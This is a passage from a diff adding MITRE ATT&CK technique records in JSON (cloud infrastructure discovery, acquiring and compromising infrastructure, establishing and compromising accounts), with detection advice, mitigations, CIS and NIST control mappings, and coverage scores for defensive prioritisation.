"mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.33658095238095237, + "adjusted_score": 0.33658095238095237, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "CA-8", + "CM-5", + "IA-2", + "IA-4", + "IA-6", + "RA-5", + "SI-4" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1580", + "name": "Cloud Infrastructure Discovery", + "description": "An adversary may attempt to discover resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket (Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block). \nSimilarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI)\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.", + "url": "https://attack.mitre.org/techniques/T1580", + "tactics": [ + "Discovery" + ], + "detection": "Establish centralized logging for the activity of cloud infrastructure components. Monitor logs for actions that could be taken to gather information about cloud infrastructure, including the use of discovery API calls by new or unexpected users. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "platforms": [ + "IaaS" + ], + "data_sources": [ + "Cloud Storage: Cloud Storage Enumeration", + "Cloud Storage: Cloud Storage Metadata", + "Instance: Instance Enumeration", + "Instance: Instance Metadata", + "Snapshot: Snapshot Enumeration", + "Snapshot: Snapshot Metadata", + "Volume: Volume Enumeration", + "Volume: Volume Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ], + "cumulative_score": 0.25671428571428573, + "adjusted_score": 0.25671428571428573, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "3.3,4.7,5.3,5.4,6.1,6.2,6.8" + ], + "nist_controls": [ + "AC-2", + "AC-3", + "AC-5", + "AC-6", + "IA-2" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": true, + "hardware_coverage": false + }, + { + "tid": "T1583", + "name": "Acquire Infrastructure", + "description": "Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.\n\nUse of these infrastructure solutions allows an adversary to stage, launch, and execute an operation. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contact to third-party web services. Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.", + "url": "https://attack.mitre.org/techniques/T1583", + "tactics": [ + "Resource Development" + ], + "detection": "Consider use of services that may aid in tracking of newly acquired infrastructure, such as WHOIS databases for domain registration information. \n\nOnce adversaries have provisioned infrastructure (ex: a server for use in command and control), internet scans may help proactively discover adversary acquired infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "platforms": [ + "PRE" + ], + "data_sources": [ + "Domain Name: Active DNS", + "Domain Name: Domain Registration", + "Domain Name: Passive DNS", + "Internet Scan: Response Content", + "Internet Scan: Response Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1583.001", + "name": "Acquire Infrastructure: Domains", + "url": "https://attack.mitre.org/techniques/T1583/001", + "description": "Adversaries may purchase domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.\n\nAdversaries can use purchased domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use internationalized domain names (IDNs) to create visually similar lookalike domains for use in operations.(Citation: CISA IDN ST05-016)\n\nDomain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)", + "detection": "Domain registration information is, by design, captured in public registration logs. Consider use of services that may aid in tracking of newly acquired domains, such as WHOIS databases and/or passive DNS. In some cases it may be possible to pivot on known pieces of domain registration information to uncover other infrastructure purchased by the adversary. Consider monitoring for domains created with a similar structure to your own, including under a different TLD. Though various tools and services exist to track, query, and monitor domain name registration information, tracking across multiple DNS infrastructures can require multiple tools/services or more advanced analytics.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access and Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1583.002", + "name": "Acquire Infrastructure: DNS Server", + "url": "https://attack.mitre.org/techniques/T1583/002", + "description": "Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.\n\nBy running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1583.003", + "name": "Acquire Infrastructure: Virtual Private Server", + "url": "https://attack.mitre.org/techniques/T1583/003", + "description": "Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)", + "detection": "Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1583.004", + "name": "Acquire Infrastructure: Server", + "url": "https://attack.mitre.org/techniques/T1583/004", + "description": "Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.\n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)", + "detection": "Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1583.005", + "name": "Acquire Infrastructure: Botnet", + "url": "https://attack.mitre.org/techniques/T1583/005", + "description": "Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1583.006", + "name": "Acquire Infrastructure: Web Services", + "url": "https://attack.mitre.org/techniques/T1583/006", + "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.", + "detection": "Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.0599, + "adjusted_score": 0.0599, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1584", + "name": "Compromise Infrastructure", + "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)", + "url": "https://attack.mitre.org/techniques/T1584", + "tactics": [ + "Resource Development" + ], + "detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. \n\nOnce adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "platforms": [ + "PRE" + ], + "data_sources": [ + "Domain Name: Active DNS", + "Domain Name: Domain Registration", + "Domain Name: Passive DNS", + "Internet Scan: Response Content", + "Internet Scan: Response Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1584.001", + "name": "Compromise Infrastructure: Domains", + "url": "https://attack.mitre.org/techniques/T1584/001", + "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)", + "detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1584.002", + "name": "Compromise Infrastructure: DNS Server", + "url": "https://attack.mitre.org/techniques/T1584/002", + "description": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.\n\nBy compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)", + "detection": "Consider monitoring for anomalous resolution changes for domain addresses. Efforts may need to be tailored to specific domains of interest as benign resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1584.003", + "name": "Compromise Infrastructure: Virtual Private Server", + "url": "https://attack.mitre.org/techniques/T1584/003", + "description": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)\n\nCompromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.", + "detection": "Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1584.004", + "name": "Compromise Infrastructure: Server", + "url": "https://attack.mitre.org/techniques/T1584/004", + "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).", + "detection": "Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1584.005", + "name": "Compromise Infrastructure: Botnet", + "url": "https://attack.mitre.org/techniques/T1584/005", + "description": "Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1584.006", + "name": "Compromise Infrastructure: Web Services", + "url": "https://attack.mitre.org/techniques/T1584/006", + "description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.", + "detection": "Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.0647149417, + "adjusted_score": 0.0647149417, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1585", + "name": "Establish Accounts", + "description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)", + "url": "https://attack.mitre.org/techniques/T1585", + "tactics": [ + "Resource Development" + ], + "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "platforms": [ + "PRE" + ], + "data_sources": [ + "Network Traffic: Network Traffic Content", + "Persona: Social Media" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1585.001", + "name": "Establish Accounts: Social Media Accounts", + "url": "https://attack.mitre.org/techniques/T1585/001", + "description": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. \n\nOnce a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + }, + { + "tid": "T1585.002", + "name": "Establish Accounts: Email Accounts", + "url": "https://attack.mitre.org/techniques/T1585/002", + "description": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)\n\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)", + "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1056", + "name": "Pre-compromise", + "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.", + "url": "https://attack.mitre.org/mitigations/M1056" + } + ], + "cumulative_score": 0.0599, + "adjusted_score": 0.0599, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [], + "nist_controls": [], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1586", + "name": "Compromise Accounts", + "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for 